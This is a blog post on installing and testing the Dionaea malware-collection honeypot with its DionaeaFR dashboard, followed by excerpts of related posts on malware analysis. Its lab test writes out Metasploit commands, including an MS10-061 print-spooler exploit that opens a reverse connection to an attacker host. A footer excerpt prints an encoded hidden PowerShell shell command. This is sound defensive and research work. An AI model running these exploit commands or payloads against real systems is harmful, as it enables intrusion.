Skip to main content
Dionaea – A Malware collection honeypot

Introduction 

This post outlines the necessary requirements, configurations and step by step installation procedure for honeypot Dionaea. It also briefs the logging of various attacks from external entities and produces the results to a dashboard interface feature for ease of understanding.

Dionaea


Dionaea is one of the modern malware collection honeypots that’s aimed to trap malware exploiting vulnerabilities exposed by services offered over a network to obtain a copy of malware. Dionaea emulates protocols by embedding python as its scripting language and also detects shellcodes using LibEmu. It also supports IPv6 and TLS. Dionaea traps malware from below mentioned protocols.
SMB (Server Message Block): 
HTTP (Hyper Text Transfer Protocol)
FTP (File Transfer Protocol)
TFTP (Trivial File Transfer Protocol) 
MSSQL (Microsoft SQL Server) 
VoIP (Voice over IP) 

Requirements 

Ubuntu 12.04 LTS Server 

Configuration 

·      sudo apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev libreadline-dev libsqlite3-dev python-dev libtool automake autoconf build-essential subversion git-core flex bison pkg-config libgc-dev libgc1c2 sqlite3 python-geoip sqlite python-pip
·      Create /opt/dionaea/ directory
mkdir /opt/dionaea/
·      Create temp directory  for installation
mkdir ~/src
·       Install Liblcfg Package
cd ~/src
git clone git://git.carnivore.it/liblcfg.git liblcfg
cd liblcfg/code
autoreconf -vi
./configure --prefix=/opt/dionaea
make install
·       Install Libemu package
cd ~/src
git clone git://git.carnivore.it/libemu.git libemu
cd libemu
autoreconf -vi
./configure --prefix=/opt/dionaea
ldconfig
·       Install Libnl
Incase of Ubuntu
apt-get install libnl-3-dev libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev
or else install it from git
cd ~/src
git clone git://git.infradead.org/users/tgr/libnl.git
cd libnl
autoreconf -vi
export LDFLAGS=-Wl,-rpath,/opt/dionaea/lib
./configure --prefix=/opt/dionaea
make
make install
ldconfig
·       Install Libev
tar -xvzf libev-4.04.tar.gz
cd libev-4.04
make install
·       Install python 3.2
cd ~/src
tar xfz Python-3.2.2.tgz
./configure --enable-shared --prefix=/opt/dionaea --with-computed-gotos --enable-ipv6 LDFLAGS="-Wl,-rpath=/opt/dionaea/lib/ -L/usr/lib/x86_64-linux-gnu/"
make
make install
ldconfig 
·       Install Cython 
cd ~/src
tar xfz Cython-0.21rc1.tar.gz
cd Cython-0.21rc1
/opt/dionaea/bin/python3 setup.py install
ldconfig
·       Install Libcurl
sudo apt-get install curl libc6 libcurl3 zlib1g
·       Install Libpcap
tar xfz libpcap-1.6.2.tar.gz
cd libpcap-1.6.2
./configure --prefix=/opt/dionaea
make
make install
ldconfig
·       Install p0f
apt-get install p0f -y
cd /
mkdir nonexistent
chown -R nobody:nogroup nonexistent
·       Clone Dionaea from github
cd ~/src
git clone git://git.carnivore.it/dionaea.git dionaea
·       Compile Dionaea
cd ~/src/dionaea
autoreconf –vi
./configure --with-lcfg-include=/opt/dionaea/include/ \
     --with-lcfg-lib=/opt/dionaea/lib/ \
     --with-python=/opt/dionaea/bin/python3.2 \
     --with-cython-dir=/opt/dionaea/bin \
     --with-udns-include=/opt/dionaea/include/ \
     --with-udns-lib=/opt/dionaea/lib/ \
     --with-emu-include=/opt/dionaea/include/ \
     --with-emu-lib=/opt/dionaea/lib/ \
     --with-gc-include=/usr/include/gc \
     --with-ev-include=/opt/dionaea/include \
     --with-ev-lib=/opt/dionaea/lib \
     --with-nl-include=/opt/dionaea/include \
     --with-nl-lib=/opt/dionaea/lib/ \
     --with-curl-config=/usr/bin/ \
     --with-pcap-include=/opt/dionaea/include \
     --with-pcap-lib=/opt/dionaea/lib/
make
make install
·       Test Dionaea installation
/opt/dionaea/bin/dionaea --help
/opt/dionaea/bin/dionaea -r /opt/dionaea

DionaeaFR – Dashboard 

·      Install pip (Python package manager) and python-netaddr package
apt-get install python-pip python-netaddr
·    Install prerequisites using pip
pip install Django
pip install pygeoip
pip install django-pagination
pip install django-tables2
pip install django-compressor
pip install django-htmlmin
·    Install django-tables2-simplefilter
cd /opt/
unzip django-tables2-simplefilter.zip
mv django-tables2-simplefilter-master/ django-tables2-simplefilter/
cd django-tables2-simplefilter/
python setup.py install
·    Install PySubnetTree
cd /opt/
cd pysubnettree/
python setup.py install
·    Compile and install Node.js from sources
cd /opt/
tar xzvf node-v0.8.16.tar.gz
cd node-v0.8.16
./configure
make
make install
·    Install LESS using npm
npm install -g less
·    Download DionaeaFR
unzip DionaeaFR.zip
mv DionaeaFR-master/ DionaeaFR
·    Get Maxmind’s GeoIP and GeoLite databases
cd /opt/
gunzip GeoLiteCity.dat.gz
gunzip GeoIP.dat.gz
mv GeoIP.dat DionaeaFR/DionaeaFR/static
mv GeoLiteCity.dat DionaeaFR/DionaeaFR/static
·    If Dionaea installation doesn’t follow official Dionaea installation guide,  the line 17 in /opt/DionaeaFR/DionaeaFR/settings.py should be set  to dionaea’s sqlite db
·    Change STATIC_ROOT variable in settings.py “Dionaea FR’s folder/static/”
·    To start DionaeaFR
cd /opt/DionaeaFR/
sudo python manage.py collectstatic  #type yes when asked
     sudo python manage.py runserver 0.0.0.0:8080 
·    DionaeaFR’s interface can also accessible via remote

Logging 

Run Dionaea to start enabling logging. Here, Dionaea is running with IP 192.168.0.109 and check for network connections status using netstat 
·      /opt/dionaea/bin/dionaea -r /opt/Dionaea

·      netstat –ntlp | grep 192.168.0.109




A nmap scan on 192.168.0.109 has come up with above ports as opened and services can be exploited with the vulnerabilities associated to them for example, to do more reconnaissance on SIP it can be scanned with various options using metasploit auxiliary. Meanwhile Dionaea picks up the traffic while metasploit auxiliary scanning is going on. The scanning traffic has been logged as shown in below fig. 


The auxiliary SIP Options scan on Port 5060 
msfcli auxiliary/scanner/sip/options CHOST=192.168.0.169 CPORT=5066                           RHOST=192.168.0.109 RPORT=5060 E

 Looking into the Dionaea log file located at /opt/Dionaea/var/log/dionaea.log, we can investigate into connection traffic and find out possible attack indicators. But, querying dionaea’s LogSQL SQLite database using a python script readlogsqltree gives the better understandable output. It can also give information logged on each incident with exploited vulnerability, time, attacker, information about shellcodes. 
python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite




Now let’s exploit the vulnerability (MS10-061) in print spool service which could allow remote code execution. Since Dionaea emulates SMB service to trap the malware now let’s exploit the remote code execution vulnerability in print spooler service on windows systems. 

msfcli exploit/windows/smb/ms10_061_spoolss PNAME=XPSPrinter RHOST=192.168.0.109 EXITFUNC=process LHOST=192.168.0.169 LPORT=4444 E

Dionaea detects and pick up the incidents as shown in below figure 


Let’s check the /opt/dionaea/var/dionaea/binaries directory to see whether dionaea captured any binary executable or not. Here we go 


Meanwhile querying the Dionaea’s LogSQL SQLite database can give better understanding of the traffic hit by attack
python3.2 /opt/dionaea/bin/readlogsqltree /opt/dionaea/var/dionaea/logsql.sqlite



Dashboard


DionaeaFR is a frontend dashboard interface to visualize the results of Dionaea honeypot. It provides the connections, downloaded malwares and attacker’s geo locations. It can also filter out the results based on states, protocols, services, ports and remote ports. It runs on local machine and also accessible remotely. To run the DionaeaFR 
•  cd /opt/DionaeaFR 
    sudo python manage.py collectstatic #type yes when asked 
    sudo python manage.py  runserver 0.0.0.0:8080 


Using filters the SIP sessions service can be seen in below figure 


The downloaded malwares can be seen in the dashboard interface 

Conclusion 

The collected malwares can be analyzed further to better understand the attacks. The geo locations of the attackers can be seen in dashboard maps interface. The dashboard interface can also be accessible remotely for interactive monitoring.



















Comments

Post a Comment

Popular posts from this blog

Memory Analysis of WannaCry Ransomware

Introduction  This post explains the memory dump analysis of WannaCry infected system using volatility (An open source memory forensics framework) and other open source tools. It doesn't cover the analysis of initial infection vector, propagation and recovery of infected system. The objective is to leverage memory forensic analysis to uncover and extract Indicators of Compromise (IoC)  WannaCry  WannaCry (or WannaCrypt, WanaCrypt0r 2.0, Wanna Decryptor) is a ransomware program targeting the Microsoft Windows operating system. On Friday, 12 May 2017, a large cyber-attack using it was launched, infecting more than 230,000 computers in 150 countries, demanding ransom payments in the cryptocurrency bitcoin in 28 languages.The attack has been described by Europol as unprecedented in scale. https://en.wikipedia.org/wiki/WannaCry_ransomware_attack Discalimer You are dealing with real malware samples Don’t expose them to internal networks or internet Analyze them in a controlle

Malicious office doc with process hollowing shellcode

Introduction  This post covers how to identify and extract shellcode manually from hancitor phishing office document. Refer  Part-1  and  Part-2  to get an understanding of  tools and approach to analyse phishing documents.  Tools  Didier Stevens Suite    sudo pip install oletools  Analysis   SHA256:  5d077b1341a6472f02aac89488976d4395a91ae4f23657b0344da74f4a560c8d   This sample contains encoded shellcode that starts a new (suspended) explorer.exe process, injects its own code (an embedded, encoded exe) and executes it.  This maldoc leverages  VBA macros  to execute its payload  and t he encoded shellcode is a property in stream 17.  T he shellcode uses WIN32 API functions like CreateProcess, ZwUnmapViewOfSection, GetThreadContext, ResumeThread etc. to inject code into the newly created process (explorer.exe) and execute it. This method is called process hollowing or process replacement.The explorer.exe process is created in a suspended state, the code for explore

Decoding Metasploit and CobaltStrike shells

Introduction This post is about how to decode one type of shellcode generated by Metasploit framework and CobaltStrike to get the C2 domain/IP address so that the incident responder can able to identify and block the further adversary activity. FYI this post doesn't cover the initial infection vector (like phishing thorough office maldoc) or how the shellcode will get generated (like from Metasploit framework or Cobaltstrike ). It leverages CyberChef to fully decode and get the shellcode from an encoded powershell command and further it will be fed into scdbg  emulator to get the IP address of C2 or an adversary ShellCode Here we have the encoded powershell command  powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAH